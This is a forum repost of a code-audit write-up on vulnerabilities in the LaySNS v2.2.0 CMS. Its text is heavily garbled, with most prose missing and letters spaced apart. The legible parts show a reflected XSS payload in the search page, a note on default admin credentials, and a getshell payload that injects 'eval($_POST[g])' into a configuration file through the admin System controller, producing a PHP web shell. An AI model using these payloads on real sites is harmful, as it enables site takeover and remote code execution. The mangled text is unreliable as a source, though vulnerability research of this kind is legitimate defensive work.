搜索

[850] 2018-03-26_【代码审计】LaySNS_v2.2.0漏洞分析

文档创建者:s7ckTeam
浏览次数:19
最后更新:2025-01-16
2018-03-26_【代码审计】LaySNS_v2.2.0漏洞分析 0 1 0 2 0 3 L a y S N S _ v 2 . 2 . 0   B y p a s s   B y p a s s   2 0 1 8 - 0 3 - 2 6         L a y S N S T h i n k P H P 5 + L a y U I L a y S N S _ v 2 . 2 . 0 L a y S N S h t t p : / / w w w . l a y s n s . c o m L a y S N S _ v 2 . 2 . 0 h t t p s : / / p a n . l a n z o u . c o m / i 0 l 3 8 l i h t t p : / / 1 2 7 . 0 . 0 . 1 / a d m i n . p h p / l o g i n / i n d e x . h t m l a d m i n / a d m i n X S S
0 4 / a p p l i c a t i o n / i n d e x / c o n t r o l l e r / I n d e x . p h p   5 0 - 6 6         k s i n d e x _ s e a r c h . h t m l X S S j s c o o k i e 1 P a y l o a d 1 1 1 < s c r i p t > a l e r t ( / x s s / ) < / s c r i p t > 2 j s G e t s h e l l / a p p l i c a t i o n / a d m i n / c o n t r o l l e r / S y s t e m . p h p   3 5 - 8 1
0 5         1 - - - - - - c m s P a y l o a d d e f a u l t ' , 1 = > e v a l ( $ _ P O S T [ g ] ) , ' x x ' = > ' 2 访 h t t p : / / 1 2 7 . 0 . 0 . 1 / a p p l i c a t i o n / e x t r a / w e b . p h p 3        
B y p a s s A b o u t   M e W A F
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理